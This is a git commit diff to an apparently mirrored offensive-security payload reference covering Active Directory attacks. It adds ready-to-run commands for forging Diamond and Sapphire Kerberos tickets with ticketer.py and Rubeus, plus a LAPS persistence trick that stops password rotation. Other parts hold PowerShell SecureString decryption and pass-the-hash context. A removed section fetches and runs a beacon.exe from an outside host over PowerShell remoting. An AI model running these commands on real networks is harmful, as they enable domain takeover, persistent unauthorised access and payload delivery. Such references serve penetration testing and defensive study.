mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Sapphire and Diamond Tickets
This commit is contained in:
parent
b7043cfedd
commit
8df0f565f3
@ -56,6 +56,8 @@
|
|||||||
- [Using Meterpreter](#using-meterpreter)
|
- [Using Meterpreter](#using-meterpreter)
|
||||||
- [Using a ticket on Linux](#using-a-ticket-on-linux)
|
- [Using a ticket on Linux](#using-a-ticket-on-linux)
|
||||||
- [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
|
- [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
|
||||||
|
- [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets)
|
||||||
|
- [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets)
|
||||||
- [Kerberoasting](#kerberoasting)
|
- [Kerberoasting](#kerberoasting)
|
||||||
- [KRB_AS_REP Roasting](#krbasrep-roasting)
|
- [KRB_AS_REP Roasting](#krbasrep-roasting)
|
||||||
- [Pass-the-Hash](#pass-the-hash)
|
- [Pass-the-Hash](#pass-the-hash)
|
||||||
@ -1605,9 +1607,11 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -
|
|||||||
|
|
||||||
### Pass-the-Ticket Golden Tickets
|
### Pass-the-Ticket Golden Tickets
|
||||||
|
|
||||||
Forging a TGT require the `krbtgt` NTLM hash
|
Forging a TGT require:
|
||||||
|
* the `krbtgt` NT hash
|
||||||
|
* since recently, we cannot use a non-existent account name as a result of `CVE-2021-42287` mitigations
|
||||||
|
|
||||||
> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt ntlm hash must be used.
|
> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used.
|
||||||
|
|
||||||
#### Using Mimikatz
|
#### Using Mimikatz
|
||||||
|
|
||||||
@ -1708,6 +1712,38 @@ Interesting services to target with a silver ticket :
|
|||||||
Mitigations:
|
Mitigations:
|
||||||
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
|
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
|
||||||
|
|
||||||
|
|
||||||
|
### Pass-the-Ticket Diamond Tickets
|
||||||
|
|
||||||
|
> Request a legit low-priv TGT and recalculate only the PAC field providing the krbtgt encryption key
|
||||||
|
|
||||||
|
Require:
|
||||||
|
* krbtgt NT Hash
|
||||||
|
* krbtgt AES key
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
ticketer.py -request -domain 'lab.local' -user 'domain_user' -password 'password' -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'
|
||||||
|
|
||||||
|
Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Pass-the-Ticket Sapphire Tickets
|
||||||
|
|
||||||
|
> Requesting the target user's PAC with `S4U2self+U2U` exchange during TGS-REQ(P) (PKINIT).
|
||||||
|
|
||||||
|
The goal is to mimic the PAC field as close as possible to a legitimate one.
|
||||||
|
|
||||||
|
Require:
|
||||||
|
* [Impacket PR#1411](https://github.com/SecureAuthCorp/impacket/pull/1411)
|
||||||
|
* krbtgt AES key
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# baduser argument will be ignored
|
||||||
|
ticketer.py -request -impersonate 'domain_adm' -domain 'lab.local' -user 'domain_user' -password 'password' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' 'baduser'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Kerberoasting
|
### Kerberoasting
|
||||||
|
|
||||||
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
|
||||||
@ -1862,7 +1898,7 @@ The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since
|
|||||||
set SMBUser jarrieta
|
set SMBUser jarrieta
|
||||||
set SMBPass nastyCutt3r
|
set SMBPass nastyCutt3r
|
||||||
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
||||||
# NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
# NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
||||||
set PAYLOAD windows/meterpreter/bind_tcp
|
set PAYLOAD windows/meterpreter/bind_tcp
|
||||||
run
|
run
|
||||||
shell
|
shell
|
||||||
@ -1893,7 +1929,7 @@ $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
|
|||||||
|
|
||||||
### OverPass-the-Hash (pass the key)
|
### OverPass-the-Hash (pass the key)
|
||||||
|
|
||||||
In this technique, instead of passing the hash directly, we use the NTLM hash of an account to request a valid Kerberost ticket (TGT).
|
In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
|
||||||
|
|
||||||
#### Using impacket
|
#### Using impacket
|
||||||
|
|
||||||
@ -3993,3 +4029,6 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
|
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
|
||||||
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
|
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
|
||||||
* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
|
* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9)
|
||||||
|
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
||||||
|
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
||||||
|
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
||||||
|
@ -588,6 +588,14 @@ kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-20
|
|||||||
kerberos::tgt
|
kerberos::tgt
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### LAPS Persistence
|
||||||
|
|
||||||
|
To prevent a machine to update its LAPS password, it is possible to set the update date in the futur.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||||
|
@ -9,9 +9,10 @@
|
|||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
* [Metasploit - SMB](#metasploit---smb)
|
* [Metasploit - SMB](#metasploit---smb)
|
||||||
* [Metasploit - Psexec](#metasploit---psexec)
|
* [Metasploit - Psexec](#metasploit---psexec)
|
||||||
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
|
||||||
* [WinRM](#winrm)
|
* [WinRM](#winrm)
|
||||||
* [Powershell Remoting](#powershell-remoting)
|
* [Powershell Remoting](#powershell-remoting)
|
||||||
|
* [Powershell Credentials](#powershell-credentials)
|
||||||
|
* [Powershell Secure String](#powershell-secure-strings)
|
||||||
* [Crackmapexec](#crackmapexec)
|
* [Crackmapexec](#crackmapexec)
|
||||||
* [Winexe](#winexe)
|
* [Winexe](#winexe)
|
||||||
* [WMI](#wmi)
|
* [WMI](#wmi)
|
||||||
@ -121,16 +122,6 @@ root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3
|
|||||||
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami'
|
root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami'
|
||||||
```
|
```
|
||||||
|
|
||||||
## Remote Code Execution with PS Credentials
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force
|
|
||||||
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword)
|
|
||||||
PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami}
|
|
||||||
PS C:\> New-PSSESSION -NAME PSDC -ComputerName COMPUTER01; Invoke-Command -ComputerName COMPUTER01 -ScriptBlock {whoami}
|
|
||||||
PS C:\> Invoke-Command -ComputerName COMPUTER01 -ScriptBlock {powershell Invoke-WebRequest -Uri 'http://10.10.10.10/beacon.exe' -OutFile 'C:\Temp\beacon.exe'; Start-Process -wait C:\Temp\beacon.exe}
|
|
||||||
```
|
|
||||||
|
|
||||||
## WinRM
|
## WinRM
|
||||||
|
|
||||||
Require:
|
Require:
|
||||||
@ -173,7 +164,6 @@ conn.shell(:powershell) do |shell|
|
|||||||
end
|
end
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Powershell Remoting
|
## Powershell Remoting
|
||||||
|
|
||||||
> PSSESSION
|
> PSSESSION
|
||||||
@ -201,6 +191,23 @@ PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
|
|||||||
PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
|
PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Powershell Credentials
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
|
||||||
|
PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass)
|
||||||
|
```
|
||||||
|
|
||||||
|
### Powershell Secure String
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
$aesKey = (49, 222, 253, 86, 26, 137, 92, 43, 29, 200, 17, 203, 88, 97, 39, 38, 60, 119, 46, 44, 219, 179, 13, 194, 191, 199, 78, 10, 4, 40, 87, 159)
|
||||||
|
$secureObject = ConvertTo-SecureString -String "76492d11167[SNIP]MwA4AGEAYwA1AGMAZgA=" -Key $aesKey
|
||||||
|
$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject)
|
||||||
|
$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted)
|
||||||
|
$decrypted
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Winexe
|
## Winexe
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user